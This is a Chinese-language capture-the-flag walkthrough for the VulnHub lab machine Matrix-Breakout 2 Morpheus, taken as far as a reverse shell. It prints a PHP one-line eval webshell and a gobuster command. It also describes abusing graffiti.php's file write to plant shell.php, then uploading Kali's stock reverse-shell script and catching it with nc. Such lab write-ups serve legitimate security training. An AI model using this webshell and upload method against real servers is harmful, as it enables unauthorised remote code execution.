【此练习仅做到反弹shell】
1.靶机下载地址
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
2. 打开靶机,kali使用nmap扫描同C段的主机 找到靶机ip
确保靶机和kali网卡均为NAT模式
先查看kali的ip
nmap 192.168.182.1/24 排除物理机、网关、kali等,可得出靶机ip为 192.168.182.162、
以及开启端口:22 ssh、80 http 、81 hosts2-ns
3. 直接通过ip访问页面 发现无法ssh,以及关键词Trinity
4. kali的dirb扫描敏感目录
发现 /robots.txt文件、
以及js脚本文件: /javascript/jquery 、 /javascript/jquery/jquery
5. 访问多个目录的网址
ip/robots.txt 无任何信息
/javascript/jquery 无权限访问
/javascript/jquery/jquery 页面源代码
无有效结果,换其他方式扫描目录
6. 使用gobuster再次扫描
输入:gobuster dir -u http://192.168.182.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
注意:
发现无gobuster ,kali使用apt命令进行安装:apt install gobuster。
如果无法找到软件包,请先更新apt命令:apt update。
再安装gobuster即可。
安装完成,再次执行开始的那条命令。
扫描结果,发现 /robots.txt 、 /graffiti.txt 、 /graffiti.php 三个可用 文件
7.对 /graffiti.txt 、 /graffiti.php 进行访问
在 graffiti.php 页面发现输入框
8.在输入框输入123456,点击Post,发现页面显示出该内容
9. 尝试输入一句话木马
输入:<?php @eval($_POST[cmd]);?>
抓包,发现将数据提交到 graffiti.txt文件中
将message值改为一句话木马,目标文件改为shell.php文件。发行,关闭拦截。
10. 访问shell.php文件,蚁剑进行连接
11. 找到kali自带的反弹shell文件,复制内容到物理机保存为1.php
kali:
cd /usr/share/webshells/
cd php
cat php-reverse-shell.php
12. 修改ip和端口
13. 将 1.php文件通过蚁剑上传到靶机中
14.kali的nc监听6654端口,浏览器访问上传的1.php,反弹shell
监听返回了shell,输入whoami验证,成功。
此练习仅做到反弹shell。
练习结束,反弹shell可通过kali的自带反弹shell文件,上传文件并访问获取shell。
对大家能有些许帮助最好,没有的话请见谅。
再见。。。
----------------2025/3/19 21:52